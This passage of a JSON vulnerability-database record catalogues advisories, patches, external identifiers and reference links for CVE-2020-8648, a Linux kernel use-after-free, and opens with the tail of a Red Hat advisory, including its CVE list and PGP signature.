563\nhttps://access.redhat.com/security/cve/CVE-2020-8566\nhttps://access.redhat.com/security/cve/CVE-2020-8619\nhttps://access.redhat.com/security/cve/CVE-2020-8622\nhttps://access.redhat.com/security/cve/CVE-2020-8623\nhttps://access.redhat.com/security/cve/CVE-2020-8624\nhttps://access.redhat.com/security/cve/CVE-2020-8647\nhttps://access.redhat.com/security/cve/CVE-2020-8648\nhttps://access.redhat.com/security/cve/CVE-2020-8649\nhttps://access.redhat.com/security/cve/CVE-2020-9327\nhttps://access.redhat.com/security/cve/CVE-2020-9802\nhttps://access.redhat.com/security/cve/CVE-2020-9803\nhttps://access.redhat.com/security/cve/CVE-2020-9805\nhttps://access.redhat.com/security/cve/CVE-2020-9806\nhttps://access.redhat.com/security/cve/CVE-2020-9807\nhttps://access.redhat.com/security/cve/CVE-2020-9843\nhttps://access.redhat.com/security/cve/CVE-2020-9850\nhttps://access.redhat.com/security/cve/CVE-2020-9862\nhttps://access.redhat.com/security/cve/CVE-2020-9893\nhttps://access.redhat.com/security/cve/CVE-2020-9894\nhttps://access.redhat.com/security/cve/CVE-2020-9895\nhttps://access.redhat.com/security/cve/CVE-2020-9915\nhttps://access.redhat.com/security/cve/CVE-2020-9925\nhttps://access.redhat.com/security/cve/CVE-2020-10018\nhttps://access.redhat.com/security/cve/CVE-2020-10029\nhttps://access.redhat.com/security/cve/CVE-2020-10732\nhttps://access.redhat.com/security/cve/CVE-2020-10749\nhttps://access.redhat.com/security/cve/CVE-2020-10751\nhttps://access.redhat.com/security/cve/CVE-2020-10763\nhttps://access.redhat.com/security/cve/CVE-2020-10773\nhttps://access.redhat.com/security/cve/CVE-2020-10774\nhttps://access.redhat.com/security/cve/CVE-2020-10942\nhttps://access.redhat.com/security/cve/CVE-2020-11565\nhttps://access.redhat.com/security/cve/CVE-2020-11668\nhttps://access.redhat.com/security/cve/CVE-2020-11793\nhttps://access.redhat.com/security/cve/CVE-2020-12465\nhttps://access.redhat.com/security/cve/CVE-2020-12655\nhttps://access.redhat.com/security/cve/CVE-2020-12659\nhttps://access.redhat.com/security/cve/CVE-2020-12770\nhttps://access.redhat.com/security/cve/CVE-2020-12826\nhttps://access.redhat.com/security/cve/CVE-2020-13249\nhttps://access.redhat.com/security/cve/CVE-2020-13630\nhttps://access.redhat.com/security/cve/CVE-2020-13631\nhttps://access.redhat.com/security/cve/CVE-2020-13632\nhttps://access.redhat.com/security/cve/CVE-2020-14019\nhttps://access.redhat.com/security/cve/CVE-2020-14040\nhttps://access.redhat.com/security/cve/CVE-2020-14381\nhttps://access.redhat.com/security/cve/CVE-2020-14382\nhttps://access.redhat.com/security/cve/CVE-2020-14391\nhttps://access.redhat.com/security/cve/CVE-2020-14422\nhttps://access.redhat.com/security/cve/CVE-2020-15157\nhttps://access.redhat.com/security/cve/CVE-2020-15503\nhttps://access.redhat.com/security/cve/CVE-2020-15862\nhttps://access.redhat.com/security/cve/CVE-2020-15999\nhttps://access.redhat.com/security/cve/CVE-2020-16166\nhttps://access.redhat.com/security/cve/CVE-2020-24490\nhttps://access.redhat.com/security/cve/CVE-2020-24659\nhttps://access.redhat.com/security/cve/CVE-2020-25211\nhttps://access.redhat.com/security/cve/CVE-2020-25641\nhttps://access.redhat.com/security/cve/CVE-2020-25658\nhttps://access.redhat.com/security/cve/CVE-2020-25661\nhttps://access.redhat.com/security/cve/CVE-2020-25662\nhttps://access.redhat.com/security/cve/CVE-2020-25681\nhttps://access.redhat.com/security/cve/CVE-2020-25682\nhttps://access.redhat.com/security/cve/CVE-2020-25683\nhttps://access.redhat.com/security/cve/CVE-2020-25684\nhttps://access.redhat.com/security/cve/CVE-2020-25685\nhttps://access.redhat.com/security/cve/CVE-2020-25686\nhttps://access.redhat.com/security/cve/CVE-2020-25687\nhttps://access.redhat.com/security/cve/CVE-2020-25694\nhttps://access.redhat.com/security/cve/CVE-2020-25696\nhttps://access.redhat.com/security/cve/CVE-2020-26160\nhttps://access.redhat.com/security/cve/CVE-2020-27813\nhttps://access.redhat.com/security/cve/CVE-2020-27846\nhttps://access.redhat.com/security/cve/CVE-2020-28362\nhttps://access.redhat.com/security/cve/CVE-2020-29652\nhttps://access.redhat.com/security/cve/CVE-2021-2007\nhttps://access.redhat.com/security/cve/CVE-2021-3121\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYDZ+bNzjgjWX9erEAQghXg//awGwjQxJ5LEZWBTdgyuCa8mHEi2rop5T\nlmebolBMNRSbo9gI8LMSHlvIBBFiV4CuFvfxE0AVLNentfzOTH11TxNWe1KQYt4H\nEmcGHPeHWTxKDkvAHtVcWXy9WN3y5d4lHSaq6AR1nHRPcj/k1upyx22kotpnYxN8\n4d49PjFTO3YbmdYpNLVJ9nY8izqUpTfM7YSyj6ANZSlaYc5Z215o6TPo6e3wobf4\nmWu+VfDS0v+/AbGhQhO2sQ7r2ysJ85MB7c62cxck4a51KiA0NKd4xr0TAA4KHnNL\nISHFzi5QYXu+meE+9wYRo1ZjJ5fbPj41+1TJbR6O4CbP0xQiFpcUSipNju3rGSGy\nAe5G/QGT8J7HzOjlKVvY3SFu/odENR6c+xUIr7IB/FBlu7DdPF2XxMZDQD4DKHEk\n4aiDbuiEL3Yf78Ic1RqPPmrj9plIwprVFQz+k3JaQXKD+1dBxO6tk+nVu2/5xNbM\nuR03hrthYYIpdXLSWU4lzq8j3kQ9wZ4j/m2o6/K6eHNl9PyqAG5jfQv9bVf8E3oG\nkrzc/JLvOfHNEQ/oJs/v/DFDmnAxshCCtGWlpLJ5J0pcD3EePsrPNs1QtQurVrMv\nRjfBCWKOij53+BinrMKHdsHxfur7GCFCIQCVaLIv6GUjX2NWI0voIVA8JkrFNNp6\nMcvuEaxco7U=\n=sw8i\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-8648"
      },
      {
        "db": "VULHUB",
        "id": "VHN-186773"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-8648"
      },
      {
        "db": "PACKETSTORM",
        "id": "157489"
      },
      {
        "db": "PACKETSTORM",
        "id": "159819"
      },
      {
        "db": "PACKETSTORM",
        "id": "163188"
      },
      {
        "db": "PACKETSTORM",
        "id": "163020"
      },
      {
        "db": "PACKETSTORM",
        "id": "163026"
      },
      {
        "db": "PACKETSTORM",
        "id": "157480"
      },
      {
        "db": "PACKETSTORM",
        "id": "161546"
      },
      {
        "db": "PACKETSTORM",
        "id": "157485"
      }
    ],
    "trust": 1.8
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-8648",
        "trust": 2.7
      },
      {
        "db": "PACKETSTORM",
        "id": "163020",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-148",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "164140",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0796",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.2039",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1745.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0719",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1476",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0692",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.2008",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0772",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1164",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2032",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1910",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0908",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.6112",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.3443",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.3075",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0797",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1745",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1812",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0925",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.3888",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2957",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1584",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.4047",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2180",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "157491",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "163968",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021062117",
        "trust": 0.6
      },
      {
        "db": "NSFOCUS",
        "id": "45778",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "163026",
        "trust": 0.2
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-04530",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-186773",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-8648",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "157489",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "159819",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163188",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "157480",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161546",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "157485",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186773"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-8648"
      },
      {
        "db": "PACKETSTORM",
        "id": "157489"
      },
      {
        "db": "PACKETSTORM",
        "id": "159819"
      },
      {
        "db": "PACKETSTORM",
        "id": "163188"
      },
      {
        "db": "PACKETSTORM",
        "id": "163020"
      },
      {
        "db": "PACKETSTORM",
        "id": "163026"
      },
      {
        "db": "PACKETSTORM",
        "id": "157480"
      },
      {
        "db": "PACKETSTORM",
        "id": "161546"
      },
      {
        "db": "PACKETSTORM",
        "id": "164140"
      },
      {
        "db": "PACKETSTORM",
        "id": "157485"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-148"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-8648"
      }
    ]
  },
  "id": "VAR-202002-1243",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186773"
      }
    ],
    "trust": 0.725
  },
  "last_update_date": "2024-07-23T21:11:15.557000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2020-005",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2020-005"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2020-004",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2020-004"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-kvm, linux-lts-xenial, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4346-1"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2020-006",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2020-006"
      },
      {
        "title": "Ubuntu Security Notice: linux-gke-5.0, linux-oem-osp11 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4344-1"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-azure, linux-gcp, linux-gke-5.3, linux-hwe, linux-kvm, linux-raspi2, linux-raspi2-5.3 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4342-1"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2020-1360",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2020-1360"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-aws-hwe, linux-azure, linux-gcp, linux-gke-4.15, linux-hwe, linux-kvm, linux-oem, linux-oracle, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4345-1"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2020-1405",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2020-1405"
      },
      {
        "title": "Brocade Security Advisories: Access Denied",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=brocade_security_advisories\u0026qid=0653676430b6017016f55e261b78af9c"
      },
      {
        "title": "Red Hat: Moderate: kernel-rt security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20204609 - security advisory"
      },
      {
        "title": "Red Hat: Moderate: kernel security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20204431 - security advisory"
      },
      {
        "title": "Debian Security Advisories: DSA-4698-1 linux -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=88a848047667226a68bbe6de9bb29095"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/vincent-deng/veracode-container-security-finding-parser "
      },
      {
        "title": "Threatpost",
        "trust": 0.1,
        "url": "https://threatpost.com/two-critical-android-bugs-rce/156216/"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-8648"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-416",
        "trust": 1.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186773"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-8648"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "https://usn.ubuntu.com/4346-1/"
      },
      {
        "trust": 1.8,
        "url": "https://security.netapp.com/advisory/ntap-20200924-0004/"
      },
      {
        "trust": 1.8,
        "url": "https://www.debian.org/security/2020/dsa-4698"
      },
      {
        "trust": 1.8,
        "url": "https://bugzilla.kernel.org/show_bug.cgi?id=206361"
      },
      {
        "trust": 1.8,
        "url": "https://lists.debian.org/debian-lts-announce/2020/06/msg00011.html"
      },
      {
        "trust": 1.8,
        "url": "https://lists.debian.org/debian-lts-announce/2020/06/msg00013.html"
      },
      {
        "trust": 1.8,
        "url": "https://lists.debian.org/debian-lts-announce/2020/06/msg00012.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00021.html"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/4342-1/"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/4344-1/"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/4345-1/"
      },
      {
        "trust": 1.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8648"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2020-8648"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.6,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.3888/"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-use-after-free-via-n-tty-receive-buf-common-31537"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0908/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1584/"
      },
      {
        "trust": 0.6,
        "url": "http://www.nsfocus.net/vulndb/45778"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/157491/ubuntu-security-notice-usn-4346-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0796/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/6520482"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2957"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163968/red-hat-security-advisory-2021-3320-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0772/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.2039/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.6112"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.4047"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2180"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1164/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1910/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.3075"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0719/"
      },
      {
        "trust": 0.6,
        "url": "https://source.android.com/security/bulletin/2020-06-01"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0925/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1745.2/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0797/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163020/red-hat-security-advisory-2021-2314-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0692"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2032"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021062117"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.2008/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.3443"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/164140/red-hat-security-advisory-2021-3522-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1745/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1812/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1476/"
      },
      {
        "trust": 0.5,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3347"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10942"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19768"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16234"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9383"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12364"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-12363"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-12362"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-27170"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12362"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12363"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-12364"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3347"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11884"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19046"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19770"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19447"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-11668"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-16233"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-16231"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14381"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19056"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19072"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19524"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8649"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19543"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8647"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-12770"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-25641"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19767"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-12655"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19533"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-9458"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19537"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-10751"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-15917"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-9455"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19068"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-20636"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-15925"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-10774"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-18808"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-11565"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-18809"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19332"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-10942"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19063"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19062"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-10732"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19319"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-20054"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-0305"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-12659"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-12826"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-28362"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27170"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8992"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/416.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://alas.aws.amazon.com/al2/alaslivepatch-2020-005.html"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1066.70"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1059.60"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.15.0-1082.92~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1061.65"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1038.42"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1061.65"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11668"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-99.100"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1038.42~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11609"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem/4.15.0-1080.90"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4345-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-hwe/4.15.0-1066.70~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.15.0-99.100~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11608"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-4.15/4.15.0-1058.61"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1077.84"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19543"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19046"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19447"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9458"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16231"
      },
      {
        "trust": 0.1,
